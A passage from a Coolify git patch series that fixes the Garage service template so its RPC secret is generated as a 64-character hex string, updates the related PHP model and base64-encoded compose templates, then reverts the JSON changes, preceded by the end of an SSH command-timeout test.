+    Storage::disk('ssh-keys')->put("ssh_key@{$server->privateKey->uuid}", $server->privateKey->private_key);
+
+    $command = SshMultiplexingHelper::generateSshCommand($server, 'echo ok', commandTimeout: 0);
+
+    expect($command)
+        ->toStartWith('ssh ')
+        ->not->toStartWith('timeout ')
+        ->not->toContain('timeout 3600 ssh');
+});
+
 it('omits native multiplexing options when ssh multiplexing is disabled for a command', function () {
     config(['constants.ssh.mux_enabled' => true]);
     $server = makeMuxServer();

From b5416859e5b5147831fafcad2fe848b6049eb728 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?J=C3=A9r=C3=A9my=20Derdaele?= <jeremy.derdaele@gmail.com>
Date: Wed, 27 May 2026 12:45:56 +0200
Subject: [PATCH 54/90] fix(templates): generate valid Garage RPC secret

Garage requires a 32 bytes secret (which is a 64 char hex string)
---
 app/Models/Service.php                  | 3 ++-
 templates/compose/garage.yaml           | 2 +-
 templates/service-templates-latest.json | 2 +-
 templates/service-templates.json        | 2 +-
 4 files changed, 5 insertions(+), 4 deletions(-)

diff --git a/app/Models/Service.php b/app/Models/Service.php
index 11189b4ac..cc8074b74 100644
--- a/app/Models/Service.php
+++ b/app/Models/Service.php
@@ -778,7 +778,8 @@ public function extraFields()
                     }
                     $rpc_secret = $this->environment_variables()->where('key', 'GARAGE_RPC_SECRET')->first();
                     if (is_null($rpc_secret)) {
-                        $rpc_secret = $this->environment_variables()->where('key', 'SERVICE_HEX_32_RPCSECRET')->first();
+                        $rpc_secret = $this->environment_variables()->where('key', 'SERVICE_HEX_64_RPCSECRET')->first()
+                            ?? $this->environment_variables()->where('key', 'SERVICE_HEX_32_RPCSECRET')->first();
                     }
                     $metrics_token = $this->environment_variables()->where('key', 'GARAGE_METRICS_TOKEN')->first();
                     if (is_null($metrics_token)) {
diff --git a/templates/compose/garage.yaml b/templates/compose/garage.yaml
index 0c559cebd..e3292dffc 100644
--- a/templates/compose/garage.yaml
+++ b/templates/compose/garage.yaml
@@ -12,7 +12,7 @@ services:
       - GARAGE_S3_API_URL=$GARAGE_S3_API_URL
       - GARAGE_WEB_URL=$GARAGE_WEB_URL
       - GARAGE_ADMIN_URL=$GARAGE_ADMIN_URL
-      - GARAGE_RPC_SECRET=${SERVICE_HEX_32_RPCSECRET}
+      - GARAGE_RPC_SECRET=${SERVICE_HEX_64_RPCSECRET}
       - GARAGE_ADMIN_TOKEN=$SERVICE_PASSWORD_GARAGE
       - GARAGE_METRICS_TOKEN=$SERVICE_PASSWORD_GARAGEMETRICS
       - GARAGE_ALLOW_WORLD_READABLE_SECRETS=true
diff --git a/templates/service-templates-latest.json b/templates/service-templates-latest.json
index d1fb5e387..147c3729f 100644
--- a/templates/service-templates-latest.json
+++ b/templates/service-templates-latest.json
@@ -1620,7 +1620,7 @@
     "garage": {
         "documentation": "https://garagehq.deuxfleurs.fr/documentation/?utm_source=coolify.io",
         "slogan": "Garage is an S3-compatible distributed object storage service designed for self-hosting.",
-        "compose": "c2VydmljZXM6CiAgZ2FyYWdlOgogICAgaW1hZ2U6ICdkeGZscnMvZ2FyYWdlOnYyLjEuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIEdBUkFHRV9TM19BUElfVVJMPSRHQVJBR0VfUzNfQVBJX1VSTAogICAgICAtIEdBUkFHRV9XRUJfVVJMPSRHQVJBR0VfV0VCX1VSTAogICAgICAtIEdBUkFHRV9BRE1JTl9VUkw9JEdBUkFHRV9BRE1JTl9VUkwKICAgICAgLSAnR0FSQUdFX1JQQ19TRUNSRVQ9JHtTRVJWSUNFX0hFWF8zMl9SUENTRUNSRVR9JwogICAgICAtIEdBUkFHRV9BRE1JTl9UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0UKICAgICAgLSBHQVJBR0VfTUVUUklDU19UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0VNRVRSSUNTCiAgICAgIC0gR0FSQUdFX0FMTE9XX1dPUkxEX1JFQURBQkxFX1NFQ1JFVFM9dHJ1ZQogICAgICAtICdSVVNUX0xPRz0ke1JVU1RfTE9HOi1nYXJhZ2U9aW5mb30nCiAgICB2b2x1bWVzOgogICAgICAtICdnYXJhZ2UtbWV0YTovdmFyL2xpYi9nYXJhZ2UvbWV0YScKICAgICAgLSAnZ2FyYWdlLWRhdGE6L3Zhci9saWIvZ2FyYWdlL2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2dhcmFnZS50b21sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2dhcmFnZS50b21sCiAgICAgICAgY29udGVudDogIm1ldGFkYXRhX2RpciA9IFwiL3Zhci9saWIvZ2FyYWdlL21ldGFcIlxuZGF0YV9kaXIgPSBcIi92YXIvbGliL2dhcmFnZS9kYXRhXCJcbmRiX2VuZ2luZSA9IFwibG1kYlwiXG5cbnJlcGxpY2F0aW9uX2ZhY3RvciA9IDFcbmNvbnNpc3RlbmN5X21vZGUgPSBcImNvbnNpc3RlbnRcIlxuXG5jb21wcmVzc2lvbl9sZXZlbCA9IDFcbmJsb2NrX3NpemUgPSBcIjFNXCJcblxucnBjX2JpbmRfYWRkciA9IFwiWzo6XTozOTAxXCJcbnJwY19zZWNyZXRfZmlsZSA9IFwiZW52OkdBUkFHRV9SUENfU0VDUkVUXCJcbmJvb3RzdHJhcF9wZWVycyA9IFtdXG5cbltzM19hcGldXG5zM19yZWdpb24gPSBcImdhcmFnZVwiXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDBcIlxucm9vdF9kb21haW4gPSBcIi5zMy5nYXJhZ2UubG9jYWxob3N0XCJcblxuW3MzX3dlYl1cbmJpbmRfYWRkciA9IFwiWzo6XTozOTAyXCJcbnJvb3RfZG9tYWluID0gXCIud2ViLmdhcmFnZS5sb2NhbGhvc3RcIlxuXG5bYWRtaW5dXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDNcIlxuYWRtaW5fdG9rZW5fZmlsZSA9IFwiZW52OkdBUkFHRV9BRE1JTl9UT0tFTlwiXG5tZXRyaWNzX3Rva2VuX2ZpbGUgPSBcImVudjpHQVJBR0VfTUVUUklDU19UT0tFTlwiIgogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIC9nYXJhZ2UKICAgICAgICAtIHN0YXRzCiAgICAgICAgLSAnLWEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQo=",
+        "compose": "c2VydmljZXM6CiAgZ2FyYWdlOgogICAgaW1hZ2U6ICdkeGZscnMvZ2FyYWdlOnYyLjEuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIEdBUkFHRV9TM19BUElfVVJMPSRHQVJBR0VfUzNfQVBJX1VSTAogICAgICAtIEdBUkFHRV9XRUJfVVJMPSRHQVJBR0VfV0VCX1VSTAogICAgICAtIEdBUkFHRV9BRE1JTl9VUkw9JEdBUkFHRV9BRE1JTl9VUkwKICAgICAgLSAnR0FSQUdFX1JQQ19TRUNSRVQ9JHtTRVJWSUNFX0hFWF82NF9SUENTRUNSRVR9JwogICAgICAtIEdBUkFHRV9BRE1JTl9UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0UKICAgICAgLSBHQVJBR0VfTUVUUklDU19UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0VNRVRSSUNTCiAgICAgIC0gR0FSQUdFX0FMTE9XX1dPUkxEX1JFQURBQkxFX1NFQ1JFVFM9dHJ1ZQogICAgICAtICdSVVNUX0xPRz0ke1JVU1RfTE9HOi1nYXJhZ2U9aW5mb30nCiAgICB2b2x1bWVzOgogICAgICAtICdnYXJhZ2UtbWV0YTovdmFyL2xpYi9nYXJhZ2UvbWV0YScKICAgICAgLSAnZ2FyYWdlLWRhdGE6L3Zhci9saWIvZ2FyYWdlL2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2dhcmFnZS50b21sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2dhcmFnZS50b21sCiAgICAgICAgY29udGVudDogIm1ldGFkYXRhX2RpciA9IFwiL3Zhci9saWIvZ2FyYWdlL21ldGFcIlxuZGF0YV9kaXIgPSBcIi92YXIvbGliL2dhcmFnZS9kYXRhXCJcbmRiX2VuZ2luZSA9IFwibG1kYlwiXG5cbnJlcGxpY2F0aW9uX2ZhY3RvciA9IDFcbmNvbnNpc3RlbmN5X21vZGUgPSBcImNvbnNpc3RlbnRcIlxuXG5jb21wcmVzc2lvbl9sZXZlbCA9IDFcbmJsb2NrX3NpemUgPSBcIjFNXCJcblxucnBjX2JpbmRfYWRkciA9IFwiWzo6XTozOTAxXCJcbnJwY19zZWNyZXRfZmlsZSA9IFwiZW52OkdBUkFHRV9SUENfU0VDUkVUXCJcbmJvb3RzdHJhcF9wZWVycyA9IFtdXG5cbltzM19hcGldXG5zM19yZWdpb24gPSBcImdhcmFnZVwiXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDBcIlxucm9vdF9kb21haW4gPSBcIi5zMy5nYXJhZ2UubG9jYWxob3N0XCJcblxuW3MzX3dlYl1cbmJpbmRfYWRkciA9IFwiWzo6XTozOTAyXCJcbnJvb3RfZG9tYWluID0gXCIud2ViLmdhcmFnZS5sb2NhbGhvc3RcIlxuXG5bYWRtaW5dXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDNcIlxuYWRtaW5fdG9rZW5fZmlsZSA9IFwiZW52OkdBUkFHRV9BRE1JTl9UT0tFTlwiXG5tZXRyaWNzX3Rva2VuX2ZpbGUgPSBcImVudjpHQVJBR0VfTUVUUklDU19UT0tFTlwiIgogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIC9nYXJhZ2UKICAgICAgICAtIHN0YXRzCiAgICAgICAgLSAnLWEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQo=",
         "tags": [
             "object",
             "storage",
diff --git a/templates/service-templates.json b/templates/service-templates.json
index 699b97e55..e320aef68 100644
--- a/templates/service-templates.json
+++ b/templates/service-templates.json
@@ -1620,7 +1620,7 @@
     "garage": {
         "documentation": "https://garagehq.deuxfleurs.fr/documentation/?utm_source=coolify.io",
         "slogan": "Garage is an S3-compatible distributed object storage service designed for self-hosting.",
-        "compose": "c2VydmljZXM6CiAgZ2FyYWdlOgogICAgaW1hZ2U6ICdkeGZscnMvZ2FyYWdlOnYyLjEuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIEdBUkFHRV9TM19BUElfVVJMPSRHQVJBR0VfUzNfQVBJX1VSTAogICAgICAtIEdBUkFHRV9XRUJfVVJMPSRHQVJBR0VfV0VCX1VSTAogICAgICAtIEdBUkFHRV9BRE1JTl9VUkw9JEdBUkFHRV9BRE1JTl9VUkwKICAgICAgLSAnR0FSQUdFX1JQQ19TRUNSRVQ9JHtTRVJWSUNFX0hFWF8zMl9SUENTRUNSRVR9JwogICAgICAtIEdBUkFHRV9BRE1JTl9UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0UKICAgICAgLSBHQVJBR0VfTUVUUklDU19UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0VNRVRSSUNTCiAgICAgIC0gR0FSQUdFX0FMTE9XX1dPUkxEX1JFQURBQkxFX1NFQ1JFVFM9dHJ1ZQogICAgICAtICdSVVNUX0xPRz0ke1JVU1RfTE9HOi1nYXJhZ2U9aW5mb30nCiAgICB2b2x1bWVzOgogICAgICAtICdnYXJhZ2UtbWV0YTovdmFyL2xpYi9nYXJhZ2UvbWV0YScKICAgICAgLSAnZ2FyYWdlLWRhdGE6L3Zhci9saWIvZ2FyYWdlL2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2dhcmFnZS50b21sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2dhcmFnZS50b21sCiAgICAgICAgY29udGVudDogIm1ldGFkYXRhX2RpciA9IFwiL3Zhci9saWIvZ2FyYWdlL21ldGFcIlxuZGF0YV9kaXIgPSBcIi92YXIvbGliL2dhcmFnZS9kYXRhXCJcbmRiX2VuZ2luZSA9IFwibG1kYlwiXG5cbnJlcGxpY2F0aW9uX2ZhY3RvciA9IDFcbmNvbnNpc3RlbmN5X21vZGUgPSBcImNvbnNpc3RlbnRcIlxuXG5jb21wcmVzc2lvbl9sZXZlbCA9IDFcbmJsb2NrX3NpemUgPSBcIjFNXCJcblxucnBjX2JpbmRfYWRkciA9IFwiWzo6XTozOTAxXCJcbnJwY19zZWNyZXRfZmlsZSA9IFwiZW52OkdBUkFHRV9SUENfU0VDUkVUXCJcbmJvb3RzdHJhcF9wZWVycyA9IFtdXG5cbltzM19hcGldXG5zM19yZWdpb24gPSBcImdhcmFnZVwiXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDBcIlxucm9vdF9kb21haW4gPSBcIi5zMy5nYXJhZ2UubG9jYWxob3N0XCJcblxuW3MzX3dlYl1cbmJpbmRfYWRkciA9IFwiWzo6XTozOTAyXCJcbnJvb3RfZG9tYWluID0gXCIud2ViLmdhcmFnZS5sb2NhbGhvc3RcIlxuXG5bYWRtaW5dXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDNcIlxuYWRtaW5fdG9rZW5fZmlsZSA9IFwiZW52OkdBUkFHRV9BRE1JTl9UT0tFTlwiXG5tZXRyaWNzX3Rva2VuX2ZpbGUgPSBcImVudjpHQVJBR0VfTUVUUklDU19UT0tFTlwiIgogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIC9nYXJhZ2UKICAgICAgICAtIHN0YXRzCiAgICAgICAgLSAnLWEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQo=",
+        "compose": "c2VydmljZXM6CiAgZ2FyYWdlOgogICAgaW1hZ2U6ICdkeGZscnMvZ2FyYWdlOnYyLjEuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIEdBUkFHRV9TM19BUElfVVJMPSRHQVJBR0VfUzNfQVBJX1VSTAogICAgICAtIEdBUkFHRV9XRUJfVVJMPSRHQVJBR0VfV0VCX1VSTAogICAgICAtIEdBUkFHRV9BRE1JTl9VUkw9JEdBUkFHRV9BRE1JTl9VUkwKICAgICAgLSAnR0FSQUdFX1JQQ19TRUNSRVQ9JHtTRVJWSUNFX0hFWF82NF9SUENTRUNSRVR9JwogICAgICAtIEdBUkFHRV9BRE1JTl9UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0UKICAgICAgLSBHQVJBR0VfTUVUUklDU19UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0VNRVRSSUNTCiAgICAgIC0gR0FSQUdFX0FMTE9XX1dPUkxEX1JFQURBQkxFX1NFQ1JFVFM9dHJ1ZQogICAgICAtICdSVVNUX0xPRz0ke1JVU1RfTE9HOi1nYXJhZ2U9aW5mb30nCiAgICB2b2x1bWVzOgogICAgICAtICdnYXJhZ2UtbWV0YTovdmFyL2xpYi9nYXJhZ2UvbWV0YScKICAgICAgLSAnZ2FyYWdlLWRhdGE6L3Zhci9saWIvZ2FyYWdlL2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2dhcmFnZS50b21sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2dhcmFnZS50b21sCiAgICAgICAgY29udGVudDogIm1ldGFkYXRhX2RpciA9IFwiL3Zhci9saWIvZ2FyYWdlL21ldGFcIlxuZGF0YV9kaXIgPSBcIi92YXIvbGliL2dhcmFnZS9kYXRhXCJcbmRiX2VuZ2luZSA9IFwibG1kYlwiXG5cbnJlcGxpY2F0aW9uX2ZhY3RvciA9IDFcbmNvbnNpc3RlbmN5X21vZGUgPSBcImNvbnNpc3RlbnRcIlxuXG5jb21wcmVzc2lvbl9sZXZlbCA9IDFcbmJsb2NrX3NpemUgPSBcIjFNXCJcblxucnBjX2JpbmRfYWRkciA9IFwiWzo6XTozOTAxXCJcbnJwY19zZWNyZXRfZmlsZSA9IFwiZW52OkdBUkFHRV9SUENfU0VDUkVUXCJcbmJvb3RzdHJhcF9wZWVycyA9IFtdXG5cbltzM19hcGldXG5zM19yZWdpb24gPSBcImdhcmFnZVwiXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDBcIlxucm9vdF9kb21haW4gPSBcIi5zMy5nYXJhZ2UubG9jYWxob3N0XCJcblxuW3MzX3dlYl1cbmJpbmRfYWRkciA9IFwiWzo6XTozOTAyXCJcbnJvb3RfZG9tYWluID0gXCIud2ViLmdhcmFnZS5sb2NhbGhvc3RcIlxuXG5bYWRtaW5dXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDNcIlxuYWRtaW5fdG9rZW5fZmlsZSA9IFwiZW52OkdBUkFHRV9BRE1JTl9UT0tFTlwiXG5tZXRyaWNzX3Rva2VuX2ZpbGUgPSBcImVudjpHQVJBR0VfTUVUUklDU19UT0tFTlwiIgogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIC9nYXJhZ2UKICAgICAgICAtIHN0YXRzCiAgICAgICAgLSAnLWEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQo=",
         "tags": [
             "object",
             "storage",

From 164ff40f044f7a977cbf1c69c7a57a591f4cf08d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?J=C3=A9r=C3=A9my=20Derdaele?= <jeremy.derdaele@gmail.com>
Date: Wed, 27 May 2026 19:46:29 +0200
Subject: [PATCH 55/90] revert changes to json files

---
 templates/service-templates-latest.json | 2 +-
 templates/service-templates.json        | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/templates/service-templates-latest.json b/templates/service-templates-latest.json
index 147c3729f..d1fb5e387 100644
--- a/templates/service-templates-latest.json
+++ b/templates/service-templates-latest.json
@@ -1620,7 +1620,7 @@
     "garage": {
         "documentation": "https://garagehq.deuxfleurs.fr/documentation/?utm_source=coolify.io",
         "slogan": "Garage is an S3-compatible distributed object storage service designed for self-hosting.",
-        "compose": "c2VydmljZXM6CiAgZ2FyYWdlOgogICAgaW1hZ2U6ICdkeGZscnMvZ2FyYWdlOnYyLjEuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIEdBUkFHRV9TM19BUElfVVJMPSRHQVJBR0VfUzNfQVBJX1VSTAogICAgICAtIEdBUkFHRV9XRUJfVVJMPSRHQVJBR0VfV0VCX1VSTAogICAgICAtIEdBUkFHRV9BRE1JTl9VUkw9JEdBUkFHRV9BRE1JTl9VUkwKICAgICAgLSAnR0FSQUdFX1JQQ19TRUNSRVQ9JHtTRVJWSUNFX0hFWF82NF9SUENTRUNSRVR9JwogICAgICAtIEdBUkFHRV9BRE1JTl9UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0UKICAgICAgLSBHQVJBR0VfTUVUUklDU19UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0VNRVRSSUNTCiAgICAgIC0gR0FSQUdFX0FMTE9XX1dPUkxEX1JFQURBQkxFX1NFQ1JFVFM9dHJ1ZQogICAgICAtICdSVVNUX0xPRz0ke1JVU1RfTE9HOi1nYXJhZ2U9aW5mb30nCiAgICB2b2x1bWVzOgogICAgICAtICdnYXJhZ2UtbWV0YTovdmFyL2xpYi9nYXJhZ2UvbWV0YScKICAgICAgLSAnZ2FyYWdlLWRhdGE6L3Zhci9saWIvZ2FyYWdlL2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2dhcmFnZS50b21sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2dhcmFnZS50b21sCiAgICAgICAgY29udGVudDogIm1ldGFkYXRhX2RpciA9IFwiL3Zhci9saWIvZ2FyYWdlL21ldGFcIlxuZGF0YV9kaXIgPSBcIi92YXIvbGliL2dhcmFnZS9kYXRhXCJcbmRiX2VuZ2luZSA9IFwibG1kYlwiXG5cbnJlcGxpY2F0aW9uX2ZhY3RvciA9IDFcbmNvbnNpc3RlbmN5X21vZGUgPSBcImNvbnNpc3RlbnRcIlxuXG5jb21wcmVzc2lvbl9sZXZlbCA9IDFcbmJsb2NrX3NpemUgPSBcIjFNXCJcblxucnBjX2JpbmRfYWRkciA9IFwiWzo6XTozOTAxXCJcbnJwY19zZWNyZXRfZmlsZSA9IFwiZW52OkdBUkFHRV9SUENfU0VDUkVUXCJcbmJvb3RzdHJhcF9wZWVycyA9IFtdXG5cbltzM19hcGldXG5zM19yZWdpb24gPSBcImdhcmFnZVwiXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDBcIlxucm9vdF9kb21haW4gPSBcIi5zMy5nYXJhZ2UubG9jYWxob3N0XCJcblxuW3MzX3dlYl1cbmJpbmRfYWRkciA9IFwiWzo6XTozOTAyXCJcbnJvb3RfZG9tYWluID0gXCIud2ViLmdhcmFnZS5sb2NhbGhvc3RcIlxuXG5bYWRtaW5dXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDNcIlxuYWRtaW5fdG9rZW5fZmlsZSA9IFwiZW52OkdBUkFHRV9BRE1JTl9UT0tFTlwiXG5tZXRyaWNzX3Rva2VuX2ZpbGUgPSBcImVudjpHQVJBR0VfTUVUUklDU19UT0tFTlwiIgogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIC9nYXJhZ2UKICAgICAgICAtIHN0YXRzCiAgICAgICAgLSAnLWEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQo=",
+        "compose": "c2VydmljZXM6CiAgZ2FyYWdlOgogICAgaW1hZ2U6ICdkeGZscnMvZ2FyYWdlOnYyLjEuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIEdBUkFHRV9TM19BUElfVVJMPSRHQVJBR0VfUzNfQVBJX1VSTAogICAgICAtIEdBUkFHRV9XRUJfVVJMPSRHQVJBR0VfV0VCX1VSTAogICAgICAtIEdBUkFHRV9BRE1JTl9VUkw9JEdBUkFHRV9BRE1JTl9VUkwKICAgICAgLSAnR0FSQUdFX1JQQ19TRUNSRVQ9JHtTRVJWSUNFX0hFWF8zMl9SUENTRUNSRVR9JwogICAgICAtIEdBUkFHRV9BRE1JTl9UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0UKICAgICAgLSBHQVJBR0VfTUVUUklDU19UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0VNRVRSSUNTCiAgICAgIC0gR0FSQUdFX0FMTE9XX1dPUkxEX1JFQURBQkxFX1NFQ1JFVFM9dHJ1ZQogICAgICAtICdSVVNUX0xPRz0ke1JVU1RfTE9HOi1nYXJhZ2U9aW5mb30nCiAgICB2b2x1bWVzOgogICAgICAtICdnYXJhZ2UtbWV0YTovdmFyL2xpYi9nYXJhZ2UvbWV0YScKICAgICAgLSAnZ2FyYWdlLWRhdGE6L3Zhci9saWIvZ2FyYWdlL2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2dhcmFnZS50b21sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2dhcmFnZS50b21sCiAgICAgICAgY29udGVudDogIm1ldGFkYXRhX2RpciA9IFwiL3Zhci9saWIvZ2FyYWdlL21ldGFcIlxuZGF0YV9kaXIgPSBcIi92YXIvbGliL2dhcmFnZS9kYXRhXCJcbmRiX2VuZ2luZSA9IFwibG1kYlwiXG5cbnJlcGxpY2F0aW9uX2ZhY3RvciA9IDFcbmNvbnNpc3RlbmN5X21vZGUgPSBcImNvbnNpc3RlbnRcIlxuXG5jb21wcmVzc2lvbl9sZXZlbCA9IDFcbmJsb2NrX3NpemUgPSBcIjFNXCJcblxucnBjX2JpbmRfYWRkciA9IFwiWzo6XTozOTAxXCJcbnJwY19zZWNyZXRfZmlsZSA9IFwiZW52OkdBUkFHRV9SUENfU0VDUkVUXCJcbmJvb3RzdHJhcF9wZWVycyA9IFtdXG5cbltzM19hcGldXG5zM19yZWdpb24gPSBcImdhcmFnZVwiXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDBcIlxucm9vdF9kb21haW4gPSBcIi5zMy5nYXJhZ2UubG9jYWxob3N0XCJcblxuW3MzX3dlYl1cbmJpbmRfYWRkciA9IFwiWzo6XTozOTAyXCJcbnJvb3RfZG9tYWluID0gXCIud2ViLmdhcmFnZS5sb2NhbGhvc3RcIlxuXG5bYWRtaW5dXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDNcIlxuYWRtaW5fdG9rZW5fZmlsZSA9IFwiZW52OkdBUkFHRV9BRE1JTl9UT0tFTlwiXG5tZXRyaWNzX3Rva2VuX2ZpbGUgPSBcImVudjpHQVJBR0VfTUVUUklDU19UT0tFTlwiIgogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIC9nYXJhZ2UKICAgICAgICAtIHN0YXRzCiAgICAgICAgLSAnLWEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQo=",
         "tags": [
             "object",
             "storage",
diff --git a/templates/service-templates.json b/templates/service-templates.json
index e320aef68..699b97e55 100644
--- a/templates/service-templates.json
+++ b/templates/service-templates.json
@@ -1620,7 +1620,7 @@
     "garage": {
         "documentation": "https://garagehq.deuxfleurs.fr/documentation/?utm_source=coolify.io",
         "slogan": "Garage is an S3-compatible distributed object storage service designed for self-hosting.",
-        "compose": "c2VydmljZXM6CiAgZ2FyYWdlOgogICAgaW1hZ2U6ICdkeGZscnMvZ2FyYWdlOnYyLjEuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIEdBUkFHRV9TM19BUElfVVJMPSRHQVJBR0VfUzNfQVBJX1VSTAogICAgICAtIEdBUkFHRV9XRUJfVVJMPSRHQVJBR0VfV0VCX1VSTAogICAgICAtIEdBUkFHRV9BRE1JTl9VUkw9JEdBUkFHRV9BRE1JTl9VUkwKICAgICAgLSAnR0FSQUdFX1JQQ19TRUNSRVQ9JHtTRVJWSUNFX0hFWF82NF9SUENTRUNSRVR9JwogICAgICAtIEdBUkFHRV9BRE1JTl9UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0UKICAgICAgLSBHQVJBR0VfTUVUUklDU19UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0VNRVRSSUNTCiAgICAgIC0gR0FSQUdFX0FMTE9XX1dPUkxEX1JFQURBQkxFX1NFQ1JFVFM9dHJ1ZQogICAgICAtICdSVVNUX0xPRz0ke1JVU1RfTE9HOi1nYXJhZ2U9aW5mb30nCiAgICB2b2x1bWVzOgogICAgICAtICdnYXJhZ2UtbWV0YTovdmFyL2xpYi9nYXJhZ2UvbWV0YScKICAgICAgLSAnZ2FyYWdlLWRhdGE6L3Zhci9saWIvZ2FyYWdlL2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2dhcmFnZS50b21sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2dhcmFnZS50b21sCiAgICAgICAgY29udGVudDogIm1ldGFkYXRhX2RpciA9IFwiL3Zhci9saWIvZ2FyYWdlL21ldGFcIlxuZGF0YV9kaXIgPSBcIi92YXIvbGliL2dhcmFnZS9kYXRhXCJcbmRiX2VuZ2luZSA9IFwibG1kYlwiXG5cbnJlcGxpY2F0aW9uX2ZhY3RvciA9IDFcbmNvbnNpc3RlbmN5X21vZGUgPSBcImNvbnNpc3RlbnRcIlxuXG5jb21wcmVzc2lvbl9sZXZlbCA9IDFcbmJsb2NrX3NpemUgPSBcIjFNXCJcblxucnBjX2JpbmRfYWRkciA9IFwiWzo6XTozOTAxXCJcbnJwY19zZWNyZXRfZmlsZSA9IFwiZW52OkdBUkFHRV9SUENfU0VDUkVUXCJcbmJvb3RzdHJhcF9wZWVycyA9IFtdXG5cbltzM19hcGldXG5zM19yZWdpb24gPSBcImdhcmFnZVwiXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDBcIlxucm9vdF9kb21haW4gPSBcIi5zMy5nYXJhZ2UubG9jYWxob3N0XCJcblxuW3MzX3dlYl1cbmJpbmRfYWRkciA9IFwiWzo6XTozOTAyXCJcbnJvb3RfZG9tYWluID0gXCIud2ViLmdhcmFnZS5sb2NhbGhvc3RcIlxuXG5bYWRtaW5dXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDNcIlxuYWRtaW5fdG9rZW5fZmlsZSA9IFwiZW52OkdBUkFHRV9BRE1JTl9UT0tFTlwiXG5tZXRyaWNzX3Rva2VuX2ZpbGUgPSBcImVudjpHQVJBR0VfTUVUUklDU19UT0tFTlwiIgogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIC9nYXJhZ2UKICAgICAgICAtIHN0YXRzCiAgICAgICAgLSAnLWEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKIC